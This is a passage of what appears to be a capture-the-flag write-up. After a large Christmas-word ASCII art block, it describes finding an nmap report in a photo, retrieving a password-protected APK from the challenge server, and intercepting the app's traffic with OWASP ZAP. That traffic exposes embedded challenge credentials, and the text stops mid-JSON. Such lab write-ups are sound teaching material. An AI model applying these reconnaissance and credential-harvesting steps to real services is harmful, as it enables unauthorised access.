JOYNORTHPOLEJOYPEACEONEARTHWELFELFQQWNORTHPOLEQWHOHOHONORTHPOLEELFELFHOHOHO
CHRISTMASSANTASANTAWJOYWCHRISTMASHOHOHONORTHPOLEJOYQQWHOHOHOSANTAWNORTHPOLE
PEACEONEARTHSANTASANTAPEACEONEARTHNORTHPOLEJOYJOYJOYELFCHRISTMASHOHOHOSANTA
SANTASANTACHRISTMASJOYJOYJOYELFJOYQWHOHOHOJOYQWPEACEONEARTHELFQQWCHRISTMASQ
GOODWILLTOWARDSMENELFPEACEONEARTHHOHOHOCHRISTMASELFQWHOHOHOWCHRISTMASHOHOHO
CHRISTMASELFELFPEACEONEARTHWELFQQWHOHOHOQQWCHRISTMASELFJOYNORTHPOLEHOHOHOQQ
SANTAPEACEONEARTHQQWJOYWCHRISTMASHOHOHOPEACEONEARTHGOODWILLTOWARDSMENJOYQWQ
JOYJOYHOHOHOELFELFP???????????????????????????????4SANTAQQWPEACEONEARTHELFQ
NORTHPOLENORTHPOLEf...............................]PEACEONEARTHQQWHOHOHOWQQ
CHRISTMASJOYHOHOHOf...............................]ELFGOODWILLTOWARDSMENELF
NORTHPOLEELFELFELFf...............................]PEACEONEARTHHOHOHOQQWELF
NORTHPOLEHOHOHOELFf...............................]CHRISTMASJOYQWSANTASANTA
SANTAJOYNORTHPOLEQf...............................]SANTAHOHOHOWJOYCHRISTMAS
GOODWILLTOWARDSMENf...............................]PEACEONEARTHHOHOHOQWJOYQ
ELFPEACEONEARTHELFf...............................]GOODWILLTOWARDSMENHOHOHO
JOYCHRISTMASELFELFf...............................]GOODWILLTOWARDSMENSANTAQ
GOODWILLTOWARDSMENf...............................]NORTHPOLEPEACEONEARTHJOY
ELFSANTAHOHOHOELFQf.......aaaaaa/....._aaaaa......]GOODWILLTOWARDSMENWELFQQ
NORTHPOLEHOHOHOELFf.......QWWWWQf.....]QQWWQ......]HOHOHOHOHOHOQQWJOYSANTAQ
SANTANORTHPOLEJOYQf.......HOHOHOf.....]JOYQQ......]HOHOHOHOHOHONORTHPOLEELF
NORTHPOLEJOYJOYELFf.......JOYELFf.....]SANTA......]NORTHPOLEHOHOHONORTHPOLE
SANTASANTASANTAELFf.......JOYELFf.....]SANTA......]NORTHPOLENORTHPOLEELFELF
GOODWILLTOWARDSMENf.......JOYJOYf.....]JOYQW......]PEACEONEARTHHOHOHOQWELFQ
GOODWILLTOWARDSMENf.......HOHOHO[.....)JOYQE......]HOHOHOELFHOHOHOQQWJOYJOY
JOYNORTHPOLEELFELFf.......$WELFQ(......$WQQ(......]PEACEONEARTHNORTHPOLEELF
NORTHPOLEJOYELFJOYf.......)ELFQ@........??'.......]CHRISTMASPEACEONEARTHJOY
SANTAPEACEONEARTHQL........?$QV'..................]HOHOHOGOODWILLTOWARDSMEN
JOYELFPEACEONEARTHk...............................jJOYSANTACHRISTMASWJOYJOY
SANTAPEACEONEARTHQW...............................jSANTAGOODWILLTOWARDSMENQ
CHRISTMASSANTAELFQQ...............................HOHOHOPEACEONEARTHSANTAQQ
ELFCHRISTMASELFELFQ;................;............=NORTHPOLENORTHPOLEJOYELFQ
NORTHPOLEJOYSANTAQQ[...............)L............jPEACEONEARTHJOYHOHOHOQQWQ
CHRISTMASHOHOHOJOYQm...............dQ,..........&amp;lt;GOODWILLTOWARDSMENQWSANTAQ
SANTACHRISTMASSANTAQL.............&amp;lt;QQm,........_JOYELFGOODWILLTOWARDSMENELF
HOHOHOSANTASANTAJOYQQc..........._mELFQc......aGOODWILLTOWARDSMENSANTAJOYWQ
CHRISTMASHOHOHOJOYJOYQw........._mELFQQWmwaawGOODWILLTOWARDSMENNORTHPOLEELF
NORTHPOLEELFPEACEONEARTHw,,..__yELFJOYJOYQWQWQWGOODWILLTOWARDSMENCHRISTMASQ
JOYNORTHPOLEELFNORTHPOLEWGOODWILLTOWARDSMENNORTHPOLEJOYJOYJOYSANTAQQWELFWQQ
JOYSANTAELFHOHOHOQQWNORTHPOLENORTHPOLEGOODWILLTOWARDSMENSANTASANTAHOHOHOJOY
ELFHOHOHOCHRISTMASCHRISTMASELFPEACEONEARTHHOHOHOELFCHRISTMASHOHOHOELFJOYELF
JOYPEACEONEARTHJOYNORTHPOLEGOODWILLTOWARDSMENHOHOHONORTHPOLEHOHOHOELFELFJOY
HOHOHOPEACEONEARTHELFJOYJOYQV?&quot;~....--&quot;?$CHRISTMASELFWPEACEONEARTHQWHOHOHOQ
CHRISTMASCHRISTMASJOYELFWW?`.............-?CHRISTMASHOHOHOQWELFWSANTAJOYWQQ
SANTAPEACEONEARTHQQWELFQP`.................-4HOHOHOWCHRISTMASNORTHPOLESANTA
CHRISTMASNORTHPOLEJOYQW(.....................)WGOODWILLTOWARDSMENNORTHPOLEQ
GOODWILLTOWARDSMENJOYW'.......................)WSANTAJOYQQWNORTHPOLEHOHOHOQ
JOYNORTHPOLEHOHOHOJOY(.........................)PEACEONEARTHSANTAELFWJOYWQQ
GOODWILLTOWARDSMENQQf...........................4PEACEONEARTHELFQWCHRISTMAS
NORTHPOLEHOHOHOELFQW`...........................-HOHOHOWCHRISTMASCHRISTMASQ
GOODWILLTOWARDSMENQf.............................]JOYJOYSANTAELFWCHRISTMASQ
HOHOHONORTHPOLEJOYQ`.............................-HOHOHOELFQWCHRISTMASSANTA
ELFELFELFJOYHOHOHOE.........._wwQWQQmga,..........$GOODWILLTOWARDSMENJOYWQQ
NORTHPOLECHRISTMASf........_yJOYWSANTAQQg,........]PEACEONEARTHPEACEONEARTH
SANTANORTHPOLEJOYQ[......._ELFELFSANTAELFQ,.......]CHRISTMASSANTASANTAWJOYQ
CHRISTMASCHRISTMAS;.......dPEACEONEARTHJOYk.......=JOYJOYHOHOHOQWJOYWHOHOHO
ELFNORTHPOLEELFELF......._HOHOHOCHRISTMASQQ,.......NORTHPOLEQWSANTASANTAELF
PEACEONEARTHJOYJOY.......]PEACEONEARTHJOYQQ[.......GOODWILLTOWARDSMENELFJOY
HOHOHOELFNORTHPOLE.......]PEACEONEARTHSANTAf.......NORTHPOLEHOHOHOHOHOHOELF
ELFSANTAELFHOHOHOQ.......]NORTHPOLEHOHOHOQQ[.......GOODWILLTOWARDSMENHOHOHO
CHRISTMASCHRISTMAS.......)PEACEONEARTHJOYQQ(.......HOHOHOHOHOHOSANTAWHOHOHO
SANTASANTAELFJOYQQ........HOHOHOCHRISTMASQ@.......:NORTHPOLEELFQWSANTASANTA
CHRISTMASCHRISTMAS;.......]PEACEONEARTHELF[.......&amp;lt;HOHOHOSANTANORTHPOLEQQWQ
HOHOHOPEACEONEARTH[........4HOHOHOJOYELFQf........]PEACEONEARTHHOHOHOHOHOHO
CHRISTMASCHRISTMASL.........&quot;HWJOYSANTAD^.........jNORTHPOLENORTHPOLEHOHOHO
GOODWILLTOWARDSMENm............&quot;!???!&quot;`...........NORTHPOLEHOHOHOWJOYQWELFQ
CHRISTMASJOYELFELFQ/.............................]WNORTHPOLECHRISTMASHOHOHO
SANTAJOYCHRISTMASQQk.............................dPEACEONEARTHELFELFHOHOHOQ
SANTAPEACEONEARTHJOY/...........................&amp;lt;NORTHPOLECHRISTMASHOHOHOQQ
ELFSANTASANTASANTAQQm...........................mJOYELFSANTAPEACEONEARTHELF
CHRISTMASCHRISTMASELFk.........................jGOODWILLTOWARDSMENQWJOYWELF
ELFJOYCHRISTMASJOYJOYQL.......................jNORTHPOLENORTHPOLEJOYJOYJOYQ
ELFELFJOYSANTAJOYELFELFg,..................._yGOODWILLTOWARDSMENQQWSANTAELF
PEACEONEARTHJOYELFQWSANTAc.................aQWCHRISTMASHOHOHOSANTAJOYHOHOHO
SANTAJOYJOYPEACEONEARTHELFQa,..........._wQWWHOHOHOSANTAJOYELFQQWJOYSANTAQQ
HOHOHOELFJOYPEACEONEARTHQQWJOYmwwaaaawyJOYWCHRISTMASHOHOHOPEACEONEARTHJOYWQ
ELFCHRISTMASSANTASANTASANTAJOYQQWWWWQWGOODWILLTOWARDSMENJOYELFQWCHRISTMASQQ
SANTAHOHOHOELFPEACEONEARTHGOODWILLTOWARDSMENJOYPEACEONEARTHSANTASANTAJOYWQQ
HOHOHOJOYELFJOYELFQWGOODWILLTOWARDSMENPEACEONEARTHGOODWILLTOWARDSMENELFELFQ
NORTHPOLEJOYJOYELFHOHOHOWPEACEONEARTHNORTHPOLECHRISTMASHOHOHOQWELFJOYQQWJOY
GOODWILLTOWARDSMENSANTAJOYNORTHPOLENORTHPOLEHOHOHOHOHOHOGOODWILLTOWARDSMENQ
CHRISTMASJOYSANTANORTHPOLEV?&quot;-....................]GOODWILLTOWARDSMENQWJOYQ
GOODWILLTOWARDSMENSANTAW?`........................]GOODWILLTOWARDSMENSANTAQ
HOHOHOELFJOYJOYELFQWQQD'..........................]HOHOHONORTHPOLEQWHOHOHOQ
PEACEONEARTHHOHOHOJOYP`...........................]SANTAJOYELFWHOHOHOHOHOHO
PEACEONEARTHHOHOHOQQD`............................]JOYPEACEONEARTHSANTAELFQ
PEACEONEARTHHOHOHOQW'.............................]CHRISTMASJOYELFQWHOHOHOQ
ELFPEACEONEARTHELFQf..............................]PEACEONEARTHELFNORTHPOLE
SANTACHRISTMASJOYQQ`..............................]NORTHPOLEQQWNORTHPOLEQWQ
CHRISTMASHOHOHOELFE...............................]SANTAGOODWILLTOWARDSMENQ
GOODWILLTOWARDSMENf...............................]GOODWILLTOWARDSMENSANTAQ
ELFCHRISTMASELFJOY[.........amWNORTHPOLEGOODWILLTOWARDSMENJOYJOYJOYQWELFWQQ
PEACEONEARTHJOYJOY(......._QQWHOHOHOWJOYWPEACEONEARTHPEACEONEARTHNORTHPOLEQ
NORTHPOLEELFELFJOY`.......mSANTAQQWCHRISTMASQQWGOODWILLTOWARDSMENQQWHOHOHOQ
JOYSANTANORTHPOLEQ`......=CHRISTMASPEACEONEARTHSANTANORTHPOLENORTHPOLESANTA
NORTHPOLESANTAJOYQ.......]NORTHPOLEPEACEONEARTHELFHOHOHOGOODWILLTOWARDSMENQ
ELFNORTHPOLESANTAQ.......]GOODWILLTOWARDSMENQWELFJOYPEACEONEARTHCHRISTMASQQ
HOHOHONORTHPOLEJOY.......]GOODWILLTOWARDSMENJOYJOYQWPEACEONEARTHJOYWSANTAWQ
PEACEONEARTHJOYELF.......-QWSANTAELFWSANTAWHOHOHOPEACEONEARTHCHRISTMASELFQQ
CHRISTMASSANTAJOYQ........]SANTASANTASANTAGOODWILLTOWARDSMENPEACEONEARTHELF
ELFHOHOHOCHRISTMAS;........?ELFJOYPEACEONEARTHELFQWGOODWILLTOWARDSMENHOHOHO
GOODWILLTOWARDSMEN[.........-&quot;????????????????????4ELFCHRISTMASHOHOHOQQWELF
SANTASANTAJOYSANTAL...............................]HOHOHOQWJOYELFQQWJOYJOYQ
NORTHPOLECHRISTMASQ...............................]NORTHPOLEELFQWJOYJOYELFQ
SANTANORTHPOLEELFQWc..............................]GOODWILLTOWARDSMENSANTAQ
JOYSANTACHRISTMASQQm..............................]ELFNORTHPOLECHRISTMASELF
CHRISTMASSANTASANTAQL.............................]PEACEONEARTHWJOYJOYQQWQQ
ELFNORTHPOLEHOHOHOJOYc............................]SANTACHRISTMASJOYELFJOYQ
SANTAELFHOHOHOJOYJOYQQc...........................]PEACEONEARTHSANTAQQWJOYQ
GOODWILLTOWARDSMENSANTAw,.........................]NORTHPOLEHOHOHONORTHPOLE
NORTHPOLENORTHPOLEQWSANTAa,.......................]PEACEONEARTHWSANTAWJOYQQ
SANTACHRISTMASHOHOHOELFELFQQgwaaaaaaaaaaaaaaaaaaaajCHRISTMASJOYPEACEONEARTH
SANTAHOHOHOPEACEONEARTHSANTAQWWWWWWWWWWWWWWWWWWWWHOHOHOELFJOYCHRISTMASELFQQ
NORTHPOLESANTASANTANORTHPOLESANTAPEACEONEARTHCHRISTMASELFHOHOHOELFJOYWJOYQQ
JOYELFJOYNORTHPOLEPEACEONEARTHJOYGOODWILLTOWARDSMENPEACEONEARTHELFELFELFELF
SANTAJOYCHRISTMASQQWELFWGOODWILLTOWARDSMENSANTANORTHPOLENORTHPOLEJOYWSANTAQ
JOYPEACEONEARTHSANTAGOODWILLTOWARDSMENJOYPEACEONEARTHJOYELFJOYCHRISTMASJOYQ
PEACEONEARTHJOYHOHOHOJOYHOHOHONORTHPOLEHOHOHOGOODWILLTOWARDSMENPEACEONEARTH
SANTASANTAELFJOYQQP???????????????????????????????4PEACEONEARTHJOYQWSANTAQQ
ELFELFHOHOHOHOHOHOf...............................]GOODWILLTOWARDSMENJOYELF
SANTAJOYELFELFELFQf...............................]CHRISTMASNORTHPOLESANTAQ
SANTAHOHOHOELFJOYQf...............................]GOODWILLTOWARDSMENELFELF
GOODWILLTOWARDSMENf...............................]CHRISTMASCHRISTMASJOYQWQ
JOYSANTAELFJOYELFQf...............................]PEACEONEARTHSANTAWHOHOHO
CHRISTMASCHRISTMASf...............................]GOODWILLTOWARDSMENSANTAQ
PEACEONEARTHSANTAQf...............................]HOHOHOHOHOHOJOYWHOHOHOWQ
JOYELFHOHOHOJOYELFf...............................]GOODWILLTOWARDSMENHOHOHO
SANTANORTHPOLEJOYQf...............................]PEACEONEARTHNORTHPOLEELF
HOHOHOGOODWILLTOWARDSMENSANTAWJOYQ@'.............sPEACEONEARTHELFWCHRISTMAS
GOODWILLTOWARDSMENHOHOHOCHRISTMASF............._yWWPEACEONEARTHELFELFJOYWQQ
SANTAGOODWILLTOWARDSMENQQWELFQQ@'.............sQWGOODWILLTOWARDSMENJOYJOYQQ
NORTHPOLECHRISTMASNORTHPOLEQQWF............._yQWELFELFELFSANTASANTAHOHOHOQQ
NORTHPOLECHRISTMASELFQQWELFQ@'.............aWCHRISTMASELFPEACEONEARTHQQWELF
SANTAHOHOHOHOHOHOJOYWSANTAQ?............._yQWPEACEONEARTHCHRISTMASQQWJOYJOY
CHRISTMASSANTACHRISTMASQQ@'.............aJOYNORTHPOLESANTAELFHOHOHOSANTAELF
SANTACHRISTMASNORTHPOLEW?............._yCHRISTMASCHRISTMASCHRISTMASHOHOHOQQ
PEACEONEARTHHOHOHOQWQQD'.............aHOHOHOHOHOHONORTHPOLEHOHOHOELFWHOHOHO
HOHOHOCHRISTMASELFELF!............._mGOODWILLTOWARDSMENCHRISTMASSANTASANTAQ
JOYPEACEONEARTHELFQD'.............aCHRISTMASPEACEONEARTHSANTAHOHOHOWSANTAQQ
NORTHPOLEJOYHOHOHOF..............&quot;????????????????4PEACEONEARTHQQWHOHOHOELF
HOHOHOELFSANTAELFQf...............................]SANTAQWJOYWNORTHPOLEELFQ
HOHOHOPEACEONEARTHf...............................]PEACEONEARTHPEACEONEARTH
JOYPEACEONEARTHELFf...............................]HOHOHOSANTASANTASANTAELF
GOODWILLTOWARDSMENf...............................]PEACEONEARTHNORTHPOLEJOY
NORTHPOLEHOHOHOELFf...............................]HOHOHOCHRISTMASWSANTAELF
ELFSANTACHRISTMASQf...............................]SANTAJOYJOYQWSANTAJOYWQQ
HOHOHONORTHPOLEJOYf...............................]PEACEONEARTHSANTAHOHOHOQ
GOODWILLTOWARDSMENf...............................]CHRISTMASCHRISTMASSANTAQ
PEACEONEARTHELFJOYf...............................]PEACEONEARTHJOYELFQQWJOY
JOYSANTAPEACEONEARTHSANTAWQQWQQWGOODWILLTOWARDSMENCHRISTMASJOYSANTASANTAJOY
ELFNORTHPOLESANTAELFHOHOHOJOYGOODWILLTOWARDSMENNORTHPOLECHRISTMASQWJOYWELFQ
HOHOHOCHRISTMASSANTAJOYCHRISTMASHOHOHOSANTAELFQQWJOYHOHOHOJOYJOYELFJOYELFQQ
CHRISTMASJOYJOYHOHOHOHOHOHOJOYPEACEONEARTHSANTAELFGOODWILLTOWARDSMENELFELFQ
HOHOHOELFHOHOHOJOYNORTHPOLEHOHOHOCHRISTMASQ???????4GOODWILLTOWARDSMENELFELF
NORTHPOLECHRISTMASQQWELFWELFWPEACEONEARTHQQ.......]HOHOHOCHRISTMASQWELFELFQ
JOYJOYGOODWILLTOWARDSMENSANTAELFQWNORTHPOLE.......]PEACEONEARTHCHRISTMASJOY
JOYELFCHRISTMASELFHOHOHOPEACEONEARTHJOYJOYQ.......]GOODWILLTOWARDSMENHOHOHO
NORTHPOLESANTAELFQQWGOODWILLTOWARDSMENELFQQ.......]CHRISTMASCHRISTMASJOYQWQ
HOHOHOSANTAELFNORTHPOLEPEACEONEARTHELFQWELF.......]SANTAHOHOHOELFSANTAELFQQ
HOHOHOSANTAPEACEONEARTHELFWJOYWSANTAQWELFQQ.......]NORTHPOLENORTHPOLEWELFQQ
SANTAHOHOHOELFELFNORTHPOLENORTHPOLEWELFJOYQ.......]GOODWILLTOWARDSMENSANTAQ
GOODWILLTOWARDSMENHOHOHOWGOODWILLTOWARDSMEN.......]SANTASANTAHOHOHOQWHOHOHO
SANTANORTHPOLESANTAWGOODWILLTOWARDSMENELFQQ.......]CHRISTMASPEACEONEARTHJOY
ELFHOHOHONORTHPOLEP????????????????????????.......]CHRISTMASSANTAQQWJOYELFQ
PEACEONEARTHSANTAQf...............................]ELFHOHOHOSANTAELFJOYELFQ
ELFCHRISTMASELFELFf...............................]GOODWILLTOWARDSMENSANTAQ
PEACEONEARTHHOHOHOf...............................]GOODWILLTOWARDSMENJOYJOY
CHRISTMASNORTHPOLEf...............................]HOHOHONORTHPOLEQWJOYELFQ
ELFPEACEONEARTHELFf...............................]GOODWILLTOWARDSMENSANTAQ
JOYJOYELFSANTAELFQf...............................]SANTANORTHPOLEELFSANTAWQ
JOYHOHOHOSANTAJOYQf...............................]PEACEONEARTHNORTHPOLEELF
SANTAELFELFHOHOHOQf...............................]CHRISTMASPEACEONEARTHELF
HOHOHONORTHPOLEELFf...............................]NORTHPOLEHOHOHOJOYWSANTA
PEACEONEARTHELFJOY6aaaaaaaaaaaaaaaaaaaaaaaa.......]PEACEONEARTHHOHOHOSANTAQ
CHRISTMASELFELFJOYQQWWWWWWWWWWWWWWWWWWWWWQQ.......]NORTHPOLENORTHPOLESANTAQ
NORTHPOLECHRISTMASHOHOHONORTHPOLEHOHOHOJOYQ.......]PEACEONEARTHELFQQWHOHOHO
JOYPEACEONEARTHJOYCHRISTMASPEACEONEARTHELFQ.......]NORTHPOLEJOYPEACEONEARTH
NORTHPOLECHRISTMASPEACEONEARTHHOHOHOSANTAQQ.......]PEACEONEARTHCHRISTMASELF
HOHOHOHOHOHONORTHPOLEELFCHRISTMASHOHOHOELFQ.......]HOHOHONORTHPOLEELFSANTAQ
NORTHPOLEJOYHOHOHOQQWPEACEONEARTHCHRISTMASQ.......]ELFHOHOHOELFSANTAJOYQQWQ
ELFJOYJOYJOYNORTHPOLEJOYPEACEONEARTHSANTAQQ.......]CHRISTMASELFELFQQWHOHOHO
SANTASANTACHRISTMASNORTHPOLENORTHPOLEELFJOY.......]PEACEONEARTHPEACEONEARTH
ELFPEACEONEARTHJOYQWJOYJOYSANTAHOHOHOJOYELF.......]GOODWILLTOWARDSMENJOYQWQ
JOYCHRISTMASJOYCHRISTMASJOYWNORTHPOLEJOYJOYaaaaaaajCHRISTMASPEACEONEARTHJOY
PEACEONEARTHCHRISTMASPEACEONEARTHWELFWSANTAWWWWWWCHRISTMASJOYNORTHPOLEJOYQQ
SANTACHRISTMASSANTAELFJOYQWNORTHPOLEELFSANTAELFQQP]NORTHPOLESANTAJOYWJOYWQQ
ELFJOYCHRISTMASNORTHPOLEWPEACEONEARTHNORTHPOLEQ@^.]HOHOHOHOHOHOELFCHRISTMAS
HOHOHOELFSANTASANTAWNORTHPOLENORTHPOLEJOYQWELFP`..]CHRISTMASPEACEONEARTHJOY
CHRISTMASJOYPEACEONEARTHJOYSANTAQWCHRISTMASQ@&quot;....]JOYGOODWILLTOWARDSMENJOY
GOODWILLTOWARDSMENJOYJOYWHOHOHOHOHOHOQQWELFP`.....]GOODWILLTOWARDSMENELFELF
ELFSANTAHOHOHOGOODWILLTOWARDSMENCHRISTMASW&quot;.......]PEACEONEARTHELFQQWELFWQQ
GOODWILLTOWARDSMENNORTHPOLEPEACEONEARTHQP`........]GOODWILLTOWARDSMENSANTAQ
CHRISTMASHOHOHOELFQWJOYWSANTAJOYWELFQQW&quot;..........]GOODWILLTOWARDSMENELFELF
JOYHOHOHOGOODWILLTOWARDSMENHOHOHOELFQP`...........]NORTHPOLENORTHPOLEHOHOHO
PEACEONEARTHGOODWILLTOWARDSMENWJOYQW&quot;.............]HOHOHOHOHOHONORTHPOLEJOY
ELFPEACEONEARTHJOYCHRISTMASHOHOHOQP`..............]PEACEONEARTHSANTAWELFWQQ
NORTHPOLEHOHOHOJOYELFSANTAQQWJOYW!................yPEACEONEARTHCHRISTMASELF
CHRISTMASELFELFJOYP?????????????`...............sPEACEONEARTHJOYJOYSANTAELF
JOYHOHOHOELFHOHOHOf..........................._mWQWNORTHPOLECHRISTMASHOHOHO
GOODWILLTOWARDSMENf..........................jCHRISTMASNORTHPOLESANTAJOYJOY
NORTHPOLEHOHOHOELFf........................_JOYPEACEONEARTHELFJOYJOYWJOYWQQ
GOODWILLTOWARDSMENf......................_yGOODWILLTOWARDSMENCHRISTMASELFQQ
NORTHPOLENORTHPOLEf.....................:GOODWILLTOWARDSMENSANTASANTAELFJOY
ELFNORTHPOLEJOYJOYf......................-9NORTHPOLEPEACEONEARTHCHRISTMASQQ
NORTHPOLEELFSANTAQf........................?WGOODWILLTOWARDSMENHOHOHOSANTAQ
GOODWILLTOWARDSMENf..........................4WJOYPEACEONEARTHHOHOHOWELFWQQ
PEACEONEARTHSANTAQf...........................-$SANTACHRISTMASHOHOHOELFJOYQ
HOHOHOELFJOYJOYJOY6aaaaaaaaaaaaa,...............?WWPEACEONEARTHPEACEONEARTH
JOYELFHOHOHOJOYSANTAWWWWWWWWWWWQQc...............-4NORTHPOLEHOHOHOQWJOYELFQ
NORTHPOLEGOODWILLTOWARDSMENSANTAWWg,..............]GOODWILLTOWARDSMENSANTAQ
NORTHPOLEHOHOHOELFHOHOHOCHRISTMASELFc.............]HOHOHOELFSANTAWCHRISTMAS
PEACEONEARTHJOYJOYNORTHPOLESANTAJOYWWg,...........]GOODWILLTOWARDSMENJOYQWQ
ELFHOHOHOELFHOHOHOCHRISTMASCHRISTMASJOYc..........]HOHOHOJOYELFQWCHRISTMASQ
PEACEONEARTHSANTAJOYWCHRISTMASJOYSANTAWWw,........]PEACEONEARTHHOHOHOELFELF
CHRISTMASJOYPEACEONEARTHSANTAPEACEONEARTHQc.......]PEACEONEARTHSANTAELFQWQQ
NORTHPOLEPEACEONEARTHJOYNORTHPOLEJOYELFQQWWw......]PEACEONEARTHWHOHOHOJOYQQ
GOODWILLTOWARDSMENQWHOHOHOQWNORTHPOLEELFELFQQ/....]PEACEONEARTHNORTHPOLEJOY
ELFGOODWILLTOWARDSMENCHRISTMASJOYWJOYWSANTAJOYg...]SANTASANTAHOHOHOJOYQWJOY
NORTHPOLEPEACEONEARTHGOODWILLTOWARDSMENELFELFQWQ,.]PEACEONEARTHNORTHPOLEJOY
CHRISTMASCHRISTMASJOYSANTAWGOODWILLTOWARDSMENQQWQwjPEACEONEARTHSANTAQWJOYQQ
ELFPEACEONEARTHJOYJOYJOYWSANTAQQWPEACEONEARTHCHRISTMASGOODWILLTOWARDSMENJOY
CHRISTMASJOYJOYJOYQWGOODWILLTOWARDSMENSANTAQQWGOODWILLTOWARDSMENJOYWHOHOHOQ
PEACEONEARTHSANTACHRISTMASSANTAELFELFQQWJOYWGOODWILLTOWARDSMENHOHOHOHOHOHOQ
PEACEONEARTHELFELFSANTAQWJOYNORTHPOLEPEACEONEARTHELFSANTAHOHOHOPEACEONEARTH
NORTHPOLECHRISTMASELFNORTHPOLEELFJOYQWCHRISTMASGOODWILLTOWARDSMENNORTHPOLEQ
JOYJOYSANTAJOYSANTACHRISTMASJOYQWPEACEONEARTHNORTHPOLECHRISTMASJOYHOHOHOELF
JOYPEACEONEARTHELFQWELFWCHRISTMASSANTASANTANORTHPOLEQWPEACEONEARTHJOYWJOYWQ
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;For the moment, we have no idea what this hidden message might mean, so let’s put it to one side and have a look at the Instagram account.&lt;/p&gt;

&lt;p&gt;The santawclaus Instagram account was host to three images, only one of which appears to contain information: the one of the messy desk.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/messy_desk.jpg&quot; alt=&quot;center messy desk&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Close inspection reveals a couple of interesting artefacts: the first is the obscured nmap scan report for the domain &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;www.northpolewonderland.com&lt;/code&gt;, and the other is the end of what looks like a PowerShell command on the laptop screen, which seems to suggest the creation of a file named &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;SantaGram_v4.2.zip&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;First of all, we consult &lt;a href=&quot;https://twitter.com/tkh16&quot;&gt;Tom Hessman&lt;/a&gt; in the quest world to make sure that &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;www.northpolewonderland.com&lt;/code&gt; &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;(130.211.124.143)&lt;/code&gt; is in scope, and he warns us that whilst this machine is part of the challenge, it should only be used for acquiring static content hosted on the webserver there, not attacked in any way.&lt;/p&gt;

&lt;p&gt;This hints to us that as we come across filenames, it’s probably worth seeing if they are hosted on this site. If we apply this logic and attempt to fetch &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;http://www.northpolewonderland.com/SantaGram_v4.2.zip&lt;/code&gt;, it seems we have correctly guessed a static asset deserving of our attention.&lt;/p&gt;

&lt;p&gt;Attempting to extract the ZIP file reveals that it is password protected, but this is where Santa’s hidden message comes into play: the password for the archive is &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;bugbounty&lt;/code&gt;. Inside is &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;SantaGram_4.2.apk&lt;/code&gt;, the social media Android application that so many of the elves in the quest world were talking about.&lt;/p&gt;

&lt;h2 id=&quot;part-2-awesome-package-konveyance&quot;&gt;Part 2: Awesome Package Konveyance&lt;/h2&gt;

&lt;p&gt;Now that we have our Android application package file, &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;SantaGram_4.2.apk&lt;/code&gt;, it’s time for us to dive in and see what we can discover, using a mixture of dynamic analysis and forensic work, and using the hints given to us by the folk in the quest world to guide us.&lt;/p&gt;

&lt;p&gt;First, we load the APK into an Android emulator to see how it behaves when it is running. I chose to use Genymotion, since it was recommended in the excellent SANS blog post, &lt;a href=&quot;https://pen-testing.sans.org/blog/2016/12/05/ghost-in-the-droid-reverse-engineering-android-apps&quot;&gt;Ghost in the Droid: Reverse Engineering Android Apps&lt;/a&gt; by &lt;a href=&quot;https://twitter.com/edskoudis&quot;&gt;Ed Skoudis&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;By proxying the emulated OS’s network traffic through &lt;a href=&quot;https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project&quot;&gt;OWASP ZAP&lt;/a&gt;, and trusting ZAP’s CA certificate in the emulated OS, we can observe the app’s HTTP(S) activity. We see communication with a few endpoints as we put the app’s functionality through its paces:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;ads.northpolewonderland.com (104.198.221.240)&lt;/code&gt;&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;analytics.northpolewonderland.com (104.198.252.157)&lt;/code&gt;&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;ex.northpolewonderland.com (104.154.196.33)&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;We will come back and analyse these individually later, but for now we can answer the question of what credentials are embedded in the APK from this dynamic analysis - a sample payload from a request to the analytics site reveals the credentials we were probably looking for:&lt;/p&gt;

&lt;figure class=&quot;highlight&quot;&gt;&lt;pre&gt;&lt;code class=&quot;language-json&quot; data-lang=&quot;json&quot;&gt;&lt;span class=&quot;p&quot;&gt;{&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;  
   &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;username&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&quot;guest&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
   &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;password&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&quot;busyreindeer78&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
   &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;type&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;     &lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&quot;usage&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
